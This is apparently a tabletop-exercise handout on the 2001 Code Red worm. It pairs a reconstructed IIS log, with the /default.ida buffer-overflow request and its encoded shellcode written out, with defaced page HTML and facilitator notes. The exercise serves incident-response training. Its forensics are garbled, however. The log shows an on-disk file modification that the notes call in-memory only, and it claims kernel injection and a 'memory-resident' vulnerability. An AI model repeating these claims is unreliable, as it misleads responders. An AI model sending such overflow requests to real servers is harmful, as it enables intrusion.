Handout A: IIS Access Log Analysis

Forensic extraction from Microsoft IIS 5.0 access log. These requests show the actual Code Red buffer overflow exploit pattern and subsequent defacement.

IIS Access Log (July 13, 2001 - First Infection)

#Software: Microsoft Internet Information Server 5.0
#Version: 1.0
#Date: 2001-07-13
#Fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes sc-bytes

[2001-07-13 14:17:23] 192.168.1.50 GET /
                      200 1245 4819

[2001-07-13 14:17:45] 203.45.67.89 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u56eb%u5645%u93f0%u0000
                      500 512 2200
                      [BUFFER OVERFLOW ATTACK - INDEXING SERVICE VULNERABLE]

[2001-07-13 14:17:46] 203.45.67.89 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u56eb%u5645%u93f0%u0000
                      500 512 2200
                      [RETRY - EXPLOIT CODE INJECTED INTO KERNEL]

[2001-07-13 14:17:47] 203.45.67.89 GET / HTTP/1.0
                      200 4819 1200
                      [VERIFICATION REQUEST - MALWARE NOW RUNNING ON SERVER]

[2001-07-13 14:18:03] 127.0.0.1 GET /default.htm HTTP/1.1
                      304 0 4819
                      [CACHED - UNCHANGED]

[2001-07-13 15:14:22] 127.0.0.1 POST /iisadmin/admin/default.htm HTTP/1.1
                      200 256 18492
                      [SERVER PROCESS ATTEMPTING FILE MODIFICATION]

[2001-07-13 15:14:45] 127.0.0.1 GET /default.htm HTTP/1.1
                      200 18492 4819
                      [MODIFIED FILE RETURNED - DEFACEMENT SUCCESSFUL]

IM NOTES (Do Not Show to Players): Technical analysis:

  1. Exploit Pattern: The long string of NNNNNNNNNNNNNN... followed by %u9090 (NOP sled) and hex values (shellcode) is the classic Code Red buffer overflow. The request is deliberately malformed to overflow the idq.dll input parsing buffer.

  2. Exploitation Success: The 500 error on the first attempt is expected – the exploit is triggering the overflow. The second attempt at 14:17:46 is the retry with the actual malicious shellcode injected. The third request at 14:17:47 succeeds (200 OK), indicating the malware is now running.

  3. Local Defacement: By 15:14, the server’s own processes (127.0.0.1 = localhost) are modifying files. This shows the worm has taken control and is defacing the website.

  4. No User Interaction: All of this happens automatically. There’s no “click here” or social engineering. The vulnerability is automatic exploitation.

Website Content Before and After Defacement

BEFORE (Normal Academic Website)

<html>
<head><title>Computer Science Department - University Technology Services</title></head>
<body bgcolor="#ffffff">
<h1>Department of Computer Science</h1>

<p>Welcome to the Computer Science Department. We offer courses in algorithms,
data structures, systems programming, and networking.</p>

<h2>Summer 2001 Courses</h2>
<ul>
<li>CS101 - Introduction to Programming</li>
<li>CS201 - Data Structures</li>
<li>CS301 - Operating Systems</li>
</ul>

<p><a href="/student-portal/">Student Course Registration</a></p>
</body>
</html>

AFTER (Defaced by Code Red)

<html>
<head><title>HACKED!</title></head>
<body bgcolor="#000000" text="#ff0000">
<h1>HELLO! Welcome to http://www.worm.com! Hacked By Chinese!</h1>

<p><img src="http://219.145.116.68/worm.jpg"></p>

<h1>Computer Science Department - DEFACED</h1>

[REMAINDER OF ORIGINAL CONTENT INACCESSIBLE]
</body>
</html>

IM NOTES (Do Not Show to Players): Key historical details:

  1. Consistent Defacement Message: “HELLO! Welcome to http://www.worm.com! Hacked By Chinese!” appeared on hundreds of thousands of servers worldwide. This hardcoded message was in the worm’s binary, NOT a separate attack.

  2. Dynamic Hosting: The image reference to 219.145.116.68/worm.jpg was originally a hosted image, but security researchers quickly took down the server. Many archived defaced pages show just the broken image reference.

  3. Attribution Confusion: The “Hacked By Chinese!” message led to global headlines about “Chinese hackers.” In reality, it was most likely misdirection by the worm authors or a false-flag message. No credible evidence of Chinese government involvement was ever found. This is one of the first examples of attribution confusion in major cyber incidents.

  4. In-Memory Modification: Interestingly, the defacement in Code Red was NOT written to disk. The malware modified the web content IN MEMORY ONLY. When the server rebooted, the original files were still intact on disk. This is why the vulnerability was called “memory-resident” and made response complex – you couldn’t just restore from backup.

Key Discovery Questions

  • What does the long string of NNNNNNNNNNN followed by %u9090 accomplish?

The Ns overflow the buffer. The %u9090 sequence (which decodes to NOP instructions in x86 assembly) creates a “landing pad” for the shellcode. Any register value can jump into the NOP sled, slide to the real shellcode, and execute it. This is the classic buffer overflow exploitation pattern.

  • Why would the malware defame the website with a message, rather than quietly stealing data?

Code Red was not designed for espionage or data theft. It was designed for automated attack propagation and DDoS. The defacement served as proof of concept and (possibly) misdirection. The real payload was the worm’s ability to scan and infect other servers automatically.

  • How would you restore a defaced website if the malware is in-memory only?

This was the conundrum for incident responders in 2001. Simply restoring backup files didn’t help if the worm reinfected them. The only lasting solution was: (1) patch the vulnerability, (2) restart the service, and (3) kill all infected server processes. Backup restoration alone would fail.

IM Facilitation Notes

This handout shows the moment of initial exploitation. It helps players understand:

  • Automated exploitation at internet scale
  • Defacement as propaganda/proof of concept
  • The exploitation-to-infection pipeline